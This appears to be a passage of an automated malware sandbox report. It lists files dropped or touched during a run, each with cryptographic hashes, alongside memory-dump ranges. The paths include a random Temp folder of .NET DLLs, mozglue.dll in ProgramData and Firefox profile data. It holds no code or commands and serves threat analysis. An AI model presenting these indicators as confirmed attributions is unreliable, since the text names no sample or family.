| SHA512 | 1b7219376c82566d50c49f521436163eda8fb50d9667527a20d355c716ea444b92cbe756d20862e16a768ec067fb8305ef011cde1149cfe9031d0d84479ef50e |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Process.dll
| MD5 | bf5183f8265c7ab13da680f758dcb596 |
| SHA1 | be25478b6c3357e3507d679269d1d4b97c1ef648 |
| SHA256 | 5f4591a617547661aa486c5b31cf9673be4c95b930a5cf898bd23b07bc1bd8fe |
| SHA512 | 5507ab30bd53bd36a6cfe25037d4c3b6e5801a24cbc17973e927b1b9675fb5be2551d73cc3b249bec118928d2d51c560cf5ec8939bd08e178a457f68ea8d3ecf |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.Primitives.dll
| MD5 | ad43b19efb5bf397a7ff7f0c4bc23f3a |
| SHA1 | 557831bf876e662941658d45b7a63242229e62fa |
| SHA256 | b95484e1e93daab32a9871faf33800ab3c583b1d830dcbd961a6cfb0cef408bb |
| SHA512 | bcbad6dddcd29c9e7f435fe38472d2cf76a9d2c9af8990a31ce86f051039b6ec2e28c0064a165e62b18883a6091cd9d9361390d4fd63ec6960910139e40f7b52 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.Specialized.dll
| MD5 | bf9a3586fec3260029027a33b85895a9 |
| SHA1 | 2d1d81a5b8dcbfcd55b736e0f7315427f8a34f18 |
| SHA256 | f48f2a6c889e04ed84623a6daa6e8111ec803296ac430ef0c28891d18ffa31d0 |
| SHA512 | c384fc356a9f36a6b784d679db68bac7c1b191143ac4bda850cb025926c6d28213cbe10148d4de4899fc04621186326ae26c146b995001a6085a30fd1d4028f0 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Registry.dll
| MD5 | 893b2cff039236aeb623dd8ea269cded |
| SHA1 | 9f0d9c6995e90717c1d8644036d5bedd7740af4b |
| SHA256 | b88fd3261604df67b5c107bf6e8f5449c9504b4040c45629abfaf85c42ff89b0 |
| SHA512 | f7c2add8591677ea5baeadf4f168db839f82af75da85425faa8ee48400dbff14daf216365cc5d574abd7b327ee6e9d2a73865768169ec3886a8b30523ae4cebb |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.dll
| MD5 | 1a8a403bc2f3e820eb4a362ad02b9888 |
| SHA1 | fe9351468302278d53f5f1bb0345480c2662ccef |
| SHA256 | c06b2f5d1c54cc7fca9eceda9bbe3bdd08ec20abf8fa4edae67db2280c233627 |
| SHA512 | 87fe8047a34149eee08330b746b6ecf6ab6c7cf66edeafb6cca111275b67d08216a8bc96577d98591dfd0f529b811ae89ff6d45b3d92b82d110688f3d64f722b |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.NonGeneric.dll
| MD5 | a8d917449a4d16c59475bff47dbe9c2f |
| SHA1 | 2f7c3fff9523d9a68b022808828be263a7fd11c8 |
| SHA256 | 88a92d9af78bd06d775609ec1a8f20deed6228894992ef66df07720db5902179 |
| SHA512 | e03636884e3dce45a0c7604effa36e90089426a802c7e95356b3002898be7a91fcb386101d48c2d5c855234e5b6541e02dc9289cf8a62622cbb8addf177b3e9d |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Primitives.dll
| MD5 | 27b3ee8d64b2b1290eaf90bfe7d0b009 |
| SHA1 | d30b53d53f0258666987f9a9fc15c862c6f36935 |
| SHA256 | 5905b9e94aae08d2d8e63a5d907493d89f98153ec95b43e241db5e3a3c6f5bb9 |
| SHA512 | cc9910757bf24efead841d0632e95bf8a24577bc762391944dd6a82048984140a3f373ccdbaa3f9869e9f38c72213eeaaaad90dd318b3870a4b827e265292c92 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.dll
| MD5 | c8d25e5421e63e07974aa119971b56f5 |
| SHA1 | 66d4dddd001bb3e432c575cfee094cb6d4dba0bc |
| SHA256 | 48f28a34628f517ec1693a5ed02ec30c2cb354a8423c43327825ead731ccadc6 |
| SHA512 | bbcc3746c978cc68f14ea735652841068822d606ad63b87538953569a9d683d5df0aa1d6901f65234de82730baf14e652879ffa8ee9fe72328fab91780ebe428 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Debug.dll
| MD5 | 5551bc52714c47940af0805e12d14585 |
| SHA1 | 98f951c402af93ed679d02036b54cd1d49facf94 |
| SHA256 | 099b31a6e3afc8afb1519509a13d0dd9ef1474821deeb4fd1141dca6125fbc46 |
| SHA512 | 4dc740b724804da1c38381c4eb7c9d9eeb2a2fd68b1c427983ab2c2a1a2d51334e929a937d622b4ff1e7caacf6c041f7873774f6e100d14ee3b575b73e8b85e6 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.CompilerServices.VisualC.dll
| MD5 | a45ad8a8dbd3b7f3e05e687d32d345fb |
| SHA1 | 0abc21058719988cb0c5a05de65cc659e929aa66 |
| SHA256 | f4991d6cb5d8b9034dfad1b5d66edbf59c86140433cfede99772815104dc178d |
| SHA512 | 5ef1598bc15e9b9f2f40901ac4fb35203243538fbe08f87765d5635b1c2467fb08eed21b5c35246082cc872758d9d10668e123f5d8c2e995ef2bacacb096ad11 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.InteropServices.dll
| MD5 | 1076372d4f3d562c2d06ed4e5d7b76fd |
| SHA1 | 4ec0e72141aa8684ca22429844626f0fa6b665e9 |
| SHA256 | 9da45352ed11cd9399be13780e1c5c235cd78e322c9b23acd4ab8ed65b76a67a |
| SHA512 | 3384c74d2a0a4fbff144e529c114bcab1265faca3509e41eea5efcf3bcdef2f836ba0e2ba1abec31cea1dcbe61a42afb33590d45c24029664f931966c74c9bdd |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.Extensions.dll
| MD5 | 672d0c20b632d42f14f3c4bd2d9d2739 |
| SHA1 | 84aee0e0d27900728ef601f68bd5892937453d22 |
| SHA256 | 2f5fd0ebed622e1ee3da1a0b96adc2e3e2a4bd91d231594acc8d6dbed441b604 |
| SHA512 | 76e2c44d166412598994c48cfa8426d09ff782b8b6703fce81710576b2998be6bfaa8f675ca67e3ebf056618a839f929ac6d8016f580c331d11f9f96c3018bc1 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\DirectWriteForwarder.dll
| MD5 | a1aec6b3f64bb37ffe136918de13e4f2 |
| SHA1 | 4ec11db15f285e488f59cf02708ee4b32d505dc5 |
| SHA256 | ad94af9432b6d5322d265d60070d3ff49f1ba1012e0c367fc8364d1c595e1ca6 |
| SHA512 | 14ffca7a127c6f806d5316448a49ac5440d0c7c8f6dc3725b4fd945fa06675ac09e3d33008c9de08af3ffab2ce91fd9c4a3c6a05713464a3115f7ed459b4e539 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationCore.dll
| MD5 | 0b1cca36b80b6681bf3dd5c3fcbc386d |
| SHA1 | 0854aef162eca94263e53fb23069cce545849ed6 |
| SHA256 | 4a5a0264e0b235c4bfe0aaebd58bffb34852ec6c1665324e972a0af8819c2af2 |
| SHA512 | 4d30522bd344357bddf4f07b67b0d98a8e3517eeb548c047de8d19c7d36692b3c89f757b4efa437e8fb2a099f7367146554f2de277794b015247438b6c330f47 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\netstandard.dll
| MD5 | 47eda957551584d4338ee35f5fe6798f |
| SHA1 | 4b5220c3f6db4d29a2d98baa972ca3dc9d0a0762 |
| SHA256 | f3ea52f01fc8bdf8f9016f5f06d2903f30fc881fd00a025a7751b63e36d8c642 |
| SHA512 | cb50fb96c860793bc21c6a9c5017748dc91243e459347599550ed816e5b7c343d5d027294169c39e081e44e42c220b5ae03dba9333832ed93d914a1e58baea2b |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.IO.Packaging.dll
| MD5 | 0e3910d0ab4f03d456f4fa3147006388 |
| SHA1 | fdcfa47b69ecc1c94dbea8c10f7185112e64de1f |
| SHA256 | 1aa626b5dc1dd98f92619e7398a3502ca07831fc027ca3cfde665304c7648ef5 |
| SHA512 | 74b4b9072f32ad3429d14240ae71390aaa35d9561d6040ba4260cb3eca7e9edad06a12d584decaf1f8d3a2d9439944d14c80ad4091734cec9eccc6cc5922f75c |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\WindowsBase.dll
| MD5 | b39792e10bcb9dd57dfd54454c9689e5 |
| SHA1 | 733788a3646d4690b4221fec4be7c0a58c40bf94 |
| SHA256 | cba553542c4ae0bf44523dd2feef65e3b363cedd53a9559fab909ceac0ea54d8 |
| SHA512 | c99cdffad83764d1fa74aed3ecc31809d0507733b77ee38d9ce0cbab58ea3aeb874cf037fa22660d63b34bd2a2cb58d2fd2dbaea1c10868127caa3cd77f08d8b |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationFramework.dll
| MD5 | 7bc571bbd86b57b59bc6257ffbb7d139 |
| SHA1 | 6b808a40dd72dddcb900bfe81ecf296420b49522 |
| SHA256 | 03d12fee9baa96b1d4c434d17fa9ff8481392dda4d54d6995fb663e0b07bb7dc |
| SHA512 | e7fc98930f72535ff314320e2a6ec8e3d86bf317bb9843306e3e8632695160bb76801cc2bf563d574f7946c42a582c7ebfe9de8ba62f2ef6276445a12b41b633 |
memory/1860-3340-0x00007FF8A2893000-0x00007FF8A2895000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jw120ick.m0f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1860-3350-0x00000286C8260000-0x00000286C8282000-memory.dmp
memory/1860-3351-0x00007FF8A2890000-0x00007FF8A3351000-memory.dmp
memory/1860-3352-0x00000286C8680000-0x00000286C86C4000-memory.dmp
memory/1860-3353-0x00007FF8A2890000-0x00007FF8A3351000-memory.dmp
memory/1860-3354-0x00000286C8750000-0x00000286C87C6000-memory.dmp
memory/1860-3357-0x00007FF8A2890000-0x00007FF8A3351000-memory.dmp
memory/1776-3358-0x00007FF8A8C30000-0x00007FF8A919F000-memory.dmp
memory/4300-3363-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4300-3366-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4300-3365-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4680-3369-0x0000000000A80000-0x0000000000CE1000-memory.dmp
memory/4680-3372-0x0000000000A80000-0x0000000000CE1000-memory.dmp
memory/4680-3370-0x0000000000A80000-0x0000000000CE1000-memory.dmp
memory/4680-3374-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\GDBFHDHJKKJDHJJJJKEG
| MD5 | e6b58580f13a479cbcdcc305c59a41c6 |
| SHA1 | 3fd7c70d2134a1c290310525e85c22501288970d |
| SHA256 | 767970e8d9e58113e4af030cb602d59d382054f12e8864507a93dfb77bbfd445 |
| SHA512 | 452e1ebb89383c1d0a58b181e96d1678f373da0c2206bc30c7d272af753bc4ec054a26dd95fd73cdc338fda3c69826371a867848a6e411a292f3b3e86dcdaf20 |
memory/3356-3439-0x0000000000400000-0x0000000000423000-memory.dmp
memory/3356-3440-0x0000000000400000-0x0000000000423000-memory.dmp
memory/2980-3441-0x0000000003340000-0x0000000003376000-memory.dmp
memory/2980-3442-0x0000000005B80000-0x00000000061A8000-memory.dmp
memory/2980-3443-0x0000000005960000-0x0000000005982000-memory.dmp
memory/2980-3444-0x0000000005B00000-0x0000000005B66000-memory.dmp
memory/2980-3445-0x0000000006320000-0x0000000006386000-memory.dmp
memory/2980-3455-0x0000000006390000-0x00000000066E4000-memory.dmp
memory/2980-3456-0x0000000006920000-0x000000000693E000-memory.dmp
memory/2980-3457-0x0000000006950000-0x000000000699C000-memory.dmp
memory/2980-3458-0x0000000008180000-0x00000000087FA000-memory.dmp
memory/2980-3459-0x0000000006E50000-0x0000000006E6A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 835eeea8a10dabb7d3ea3d572076d690 |
| SHA1 | 17da5b59b767cf988af5adab80ff32fe905775b7 |
| SHA256 | a872fad6c893498005b7717cf32074a515864c0e3924b86c2ee45ab64b40eb09 |
| SHA512 | 754e4d04ad973b4223333211056e7c03d1e1c5ad71d24f0dba4f5dfc05a614b23d7d07c397f6417304debe34a84241e13a483f28e8894912b64ef34d34b35b3b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 40c623a094bd5d6047d290ae4ce3c5bd |
| SHA1 | 414373babb59c6baebed7049afc03618b91c3453 |
| SHA256 | 76cdbf3fb7f73c10c9e681b3e84a3299b0d792d8e47c86791f8f68ab97d88bad |
| SHA512 | 7bd916135c9e1dd28f2ae5746ad1f07f9014c142a3c32c8ea93533a3ef3928880623f177d25b6c95237805bea7c59959d3c26974eb43affa3410a5ac51078d2d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 0651daa3a24f4f129b1e67682db8e107 |
| SHA1 | 887472be53a9234ca118c44e2de33ee01072a4c5 |
| SHA256 | 1e53ba358a42f4e44472f1eccd157d361815993a787d33005b2abd45c4d60afc |
| SHA512 | 678ea735ac31583714d3372c83f8d2e61e7965c4627b380974296860211db4b87fbbd0ff3be370cb4c6c9196556fdcbb3217328439f24e8ff8a74ae8be611190 |
memory/2980-3473-0x0000000007F40000-0x0000000007F4A000-memory.dmp
memory/2980-3474-0x0000000009D30000-0x000000000A25C000-memory.dmp
memory/2980-3475-0x0000000009800000-0x00000000099C2000-memory.dmp
memory/2980-3476-0x0000000008060000-0x00000000080F6000-memory.dmp
memory/2980-3477-0x0000000008010000-0x0000000008032000-memory.dmp
memory/2980-3478-0x000000000A810000-0x000000000ADB4000-memory.dmp
memory/2980-3480-0x0000000005680000-0x0000000005692000-memory.dmp
memory/2980-3580-0x000000000A310000-0x000000000A3A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | d2dc06c067643b1f451700ac3844e74d |
| SHA1 | 54ffac00f5c0e5211c682bbcb1cac7b08aec53aa |
| SHA256 | 109b435e3de82c4c4b1bd3c1e301fe2ae0591c632fdcb50dd0be11bb53424c2b |
| SHA512 | 638d3cb22a40410c18930878e72215a08909d6853fbc2932bd8f24ba4651e03da68f6ddcc255287757b2f50d69555c1c27ad7233fc6314f9822d1fd319bc4cd0 |